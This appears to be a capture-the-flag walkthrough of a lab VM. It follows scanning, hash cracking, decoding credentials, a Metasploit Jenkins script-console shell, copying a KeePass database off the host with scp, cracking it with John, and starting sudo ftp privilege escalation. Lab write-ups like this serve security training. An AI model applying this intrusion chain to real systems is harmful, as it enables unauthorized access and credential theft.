We start scanning the host with nmap -A -T4 -p- 192.168.1.20 –vv
Dirb scan results:
Along this pwd.txt file there is a reality.cap that we downloaded, and it looks like it’s a deauthentication file from a wifi router, cracking it with Aircrack-ng but gave me nothing:
Downloading the space image file and viewing the file with exiftool we can see a comment inside the photo
It says space stone and some hash, when cracking the hash online came with the name yashika
The page aether.php is a quiz page solving it as binary gave us this code 01101001 as path to hint file:
Wow I came to this weird looking code, ran it through google and came to be a BrainFuck language and after decoding it gave me login name and password admin:avengers
Now lets head to http://192.168.1.20:8080 to login there
And we got in :
Now if you search for Jenkins on searchsploit you will find an exploit through Metasploit where we can use to gain a shell to the host use exploit/multi/http/jenkins_script_console
Using LinEnum.sh script gave me a file script at /opt and there was another file morag.kdbx which I copied it to /html so I can download it to my machine, the file script we already found it before BUT it was inside the image were we decode it and found yashika.
While copying the file to /var/www/html I found a folder named gamA00fe2012 which would be the password to the file reality.cap we found earlier.
And just to be sure I ran it again through Aircrack-ng and yes it’s the password for the file reality.cap
Now back to the morag.kdbx file I copied to my machine using scp -P 22 morag.kdbx email@example.com:/root/ and looked for .kdbx files so what I did is converted thi file to hash so I can crack the hash in John.
now we got the password we can open the file with the password princesa, by going to a website online https://app.keeweb.info/
I was able to open the file and found a base64 format that we can convert, ( morag:yondu)
So what I did is just write sudo /usr/bin/ftp